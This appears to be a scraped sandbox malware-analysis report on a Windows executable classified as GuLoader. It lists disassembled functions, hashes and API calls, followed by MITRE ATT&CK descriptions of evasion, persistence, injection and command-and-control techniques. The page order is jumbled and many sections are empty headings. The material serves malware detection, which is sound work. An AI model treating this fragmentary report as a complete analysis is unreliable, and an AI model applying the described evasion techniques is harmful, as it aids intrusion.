Instruction Fuzzy Hash: EAC02B8B6010710D4FB238B533CA13C8C0307C09103168BD03034D1DCEEFA68E050C20

Uniqueness

Uniqueness Score: -1.00%

Function 021855ED, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.344627340.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0ec8044d55284a10f5932728e6c4a76dbf9d83842d798d8e448099b51cb11e3
Instruction ID: a026a310f9d08bb1d858143eb29fddbf5fc3d9bc52f9beb0b7c2352c6f2dcf67
Opcode Fuzzy Hash: e0ec8044d55284a10f5932728e6c4a76dbf9d83842d798d8e448099b51cb11e3
Instruction Fuzzy Hash: CDB002B66515819FEF56DB08D591B4073A4FB55648B0904D0E412DB712D224E910CA04

Uniqueness

Uniqueness Score: -1.00%

Function 02187540, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.344627340.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab2d7faec90206d04624137dcf391b9a6c0b9a6dad95826754e4c5e29fff86cb
Instruction ID: bebcbd0f18a999ce64e2d619b59837d29f74db5f3d96bd371bc818b82041d4c7
Opcode Fuzzy Hash: ab2d7faec90206d04624137dcf391b9a6c0b9a6dad95826754e4c5e29fff86cb
Instruction Fuzzy Hash: F9B00179662A80CFCE96CF09C290E40B3B4FB48B50F4258D0E8118BB22C268E900CA10

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: pRcHGlVekw.exe PID: 1724 Parent PID: 3164 pRcHGlVekw.exeCOMMON

Executed Functions

Function 00569BF7, Relevance: 1.5, APIs: 1, Instructions: 40threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNELBASE(-03C756C2,4B129F94), ref: 00569C7D

Memory Dump Source

Source File: 00000010.00000002.1299795614.0000000000569000.00000040.00000001.sdmp, Offset: 00569000, based on PE: false

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: bbfaeda1f07973cd9ca9bf337fb0735c4a6ca892f5302721e6af23975d21b7cb
Instruction ID: abf786c3b62b3742048d7f3d863e217be1e8ebb13ff33950d9e1f34c285991f9
Opcode Fuzzy Hash: bbfaeda1f07973cd9ca9bf337fb0735c4a6ca892f5302721e6af23975d21b7cb
Instruction Fuzzy Hash: 22F0FFB91157889BCB79EF3498E67D93BA17F52381F08042E8C4ACF241C33545098B2A

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report pRcHGlVekw.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: GuLoader

Yara Overview

Memory Dumps

Sigma Overview

Jbx Signature Overview

AV Detection:

Compliance:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

Function 00401144, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 183
COMMON